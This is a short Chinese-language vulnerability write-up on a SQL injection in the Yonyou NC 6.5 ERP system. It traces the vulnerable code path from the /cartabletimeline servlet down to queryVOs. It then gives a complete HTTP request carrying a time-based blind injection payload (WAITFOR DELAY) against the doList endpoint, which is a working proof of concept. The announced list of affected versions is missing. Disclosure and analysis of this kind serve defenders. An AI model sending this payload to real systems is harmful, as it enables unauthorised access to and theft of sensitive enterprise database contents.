漏洞描述

   用友NC是一款大型erp企業管理系統與電子商務平臺。用友網絡科技股份有限公司用友NC存在SQL注入漏洞，攻擊者可利用該漏洞獲取數據庫敏感信息。 影響版本如下

用友NC6.5漏洞分析

VsmAction類中此處存在@Servlet注解，也就是說當訪問路徑為/cartabletimeline會直接定位到這里。

跟進getVehicleApplyInfo方法接口類ICarTalbeService，定義了getVehicleApplyInfo方法

找到接口類ICarTalbeService的實現類CarTableServiceImpl

跟進getgetUserVehicleApplyInfo方法

跟進queryVOs方法

漏洞復現（自測）

GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: x.x.x.x:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=778E1EE003971592F31449220834A1AE.server
Priority: u=4